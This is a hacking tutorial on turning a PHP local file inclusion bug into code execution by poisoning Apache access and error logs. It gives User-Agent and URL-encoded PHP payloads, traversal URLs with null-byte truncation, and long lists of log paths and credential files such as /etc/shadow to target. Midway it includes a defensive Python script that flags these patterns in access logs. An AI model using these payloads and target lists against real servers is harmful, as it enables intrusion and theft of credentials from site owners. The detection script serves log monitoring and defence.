LFI Apache log poisoning

  • LFI Apache Log Poisoning by Ausome1
    
    Here's a quick overview:
    
    If you find a file inclusion vulnerability and you can't turn it into a remote file include (RFI), but you can still use the LFI to read files outside the /home/$user directory (open_basedir turned off), one way to get PHP code onto the server for execution is to poison some logs. Apache's logs are a good choice.
    
    There are 2 Apache files we can try to attack: the access_log and the error_log. To attack the Apache access log we can install the Firefox extension User Agent Switcher. What we do is put some PHP code in our user agent like so:
    
    
    
    or another example 
    
    Now set FF to use that php_info User Agent you just made and visit the web page. Apache has now written your user agent string into the access_log.
    
    Now we need to find where these Apache log files are located and use our LFI to reach them, e.g.:
    
    http://example_site.com/index.php?view=../../../../../../etc/httpd/logs/access_log%00
    
    This will include the log and execute your PHP code.
    
    As an FYI, you cannot use double quotes or backslashes in your UA: Apache escapes them when writing the access log, so your code is mangled and you just get a parse error.
    
    So do something like, in your UA:
    
    ');?>
    
    Single quotes are fine, and unquoted array indexes are fine too: use $_GET[cmd] instead of $_GET['cmd'].
    
    Now there is a downside to attacking the access_log: on busy sites it tends to get big. If the file is too big, the PHP script that includes it will time out.
    
    So you may have to wait until the logs rotate (usually Sunday night) and attack then.
    
    Or you can try the Apache error_log; those tend to be smaller.
    
    How to attack the error_log:
    
    For this one we don't use the User Agent; we can get PHP code into the log via the URL.
    
    What we do is cause a 404 with our PHP code in the path:
    
    http://example_site.com/%3C%3Fphp%20phpinfo%28%29%3B%3F%3E   <== URL-encoded
    
    You have to URL-encode your PHP because of the ?: Apache treats everything after it as the query string and drops it, so the unencoded code would never make it into the error_log.
    
    Now that we have poisoned the error_log we can LFI to it and include our PHP code.
    
    I like to use the Firefox extension HackBar for this one. You can write your PHP code, highlight it, click URL-encode, then execute.
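From the defender's side, both techniques above leave a signature in the access_log itself: a PHP open tag in the User-Agent or in the request path, and a traversal sequence (often with a %00) pointing at a log file. The following detector is an added example, not part of the original post; it parses Apache combined-format lines and flags those patterns over a constructed sample log (the log lines, IPs and timestamps are made up).

```python
import re
from urllib.parse import unquote

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)   # a PHP open tag being written into the log
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')                  # ../ or ..\ after decoding
SENSITIVE_RE = re.compile(r'(access|error)[._]log|/var/log/|/proc/self/|/etc/(passwd|shadow)', re.IGNORECASE)

# Constructed sample (not from the post): a clean request, PHP in the User-Agent, an LFI to the
# access_log with %00, PHP in the path of a 404 (error_log poisoning), and a traversal to /etc/passwd.
SAMPLE_LOG = '''
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?view=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET / HTTP/1.1" 200 1024 "-" "<?php phpinfo(); ?>"
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?view=../../../../../../etc/httpd/logs/access_log%00 HTTP/1.1" 200 70321 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /%3C%3Fphp%20phpinfo%28%29%3B%3F%3E HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /docs/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 196 "-" "curl/8.0"
'''

def analyze(line: str) -> list:
    """Return the findings for one access-log line; an empty list means nothing suspicious."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparsed-line"]
    # Decode twice so a double-encoded payload (%253C...) is still caught.
    request, ua = unquote(unquote(m.group("request"))), unquote(unquote(m.group("ua")))
    findings = []
    if PHP_TAG_RE.search(request):          # path/query poisoning, lands in error_log on a 404
        findings.append("php-tag-in-request")
    if PHP_TAG_RE.search(ua):               # User-Agent poisoning, lands in access_log
        findings.append("php-tag-in-user-agent")
    if TRAVERSAL_RE.search(request):        # the LFI side: walking up to a log or /etc
        findings.append("path-traversal")
        if SENSITIVE_RE.search(request):
            findings.append("sensitive-target")
    if "\x00" in request:                   # %00 truncation of an appended suffix (old PHP)
        findings.append("null-byte")
    return findings

def scan(log_text: str) -> dict:
    """Map 1-based line numbers to findings, keeping only lines that triggered something."""
    report = {}
    for number, line in enumerate(log_text.strip().splitlines(), start=1):
        findings = analyze(line)
        if findings:
            report[number] = findings
    return report
```

Run `scan()` over a real access_log to get the same report; lines whose User-Agent contains escaped quotes (`\"`) are reported as unparsed rather than silently skipped.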
    
    Also, Apache logs aren't the only things you can attack. Other programs have log files as well, and if a website stores user input in a session variable that is saved on disk, you can LFI to the session file and include that.
    
    Here are a couple of places that may be interesting to "visit" with your LFI:
    
    /etc/passwd
    /etc/shadow
    /etc/group
    /etc/security/group
    /etc/security/passwd
    /etc/security/user
    /etc/security/environ
    /etc/security/limits
    /usr/lib/security/mkuser.default
    
    Possible log locations:
    
    ../apache/logs/error.log
    ../apache/logs/access.log
    ../../apache/logs/error.log
    ../../apache/logs/access.log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    ../../../../../../../etc/httpd/logs/access_log
    ../../../../../../../etc/httpd/logs/access.log
    ../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../var/www/logs/access_log
    ../../../../../../../var/www/logs/access.log
    ../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../var/log/apache/access_log
    ../../../../../../../var/log/apache2/access_log
    ../../../../../../../var/log/apache/access.log
    ../../../../../../../var/log/apache2/access.log
    ../../../../../../../var/log/access_log
    ../../../../../../../var/log/access.log
    ../../../../../../../var/www/logs/error_log
    ../../../../../../../var/www/logs/error.log
    ../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../var/log/apache/error_log
    ../../../../../../../var/log/apache2/error_log
    ../../../../../../../var/log/apache/error.log
    ../../../../../../../var/log/apache2/error.log
    ../../../../../../../var/log/error_log
    ../../../../../../../var/log/error.log
    
    Also, looking in the httpd.conf file may reveal the location of the log files if they are using custom names or paths.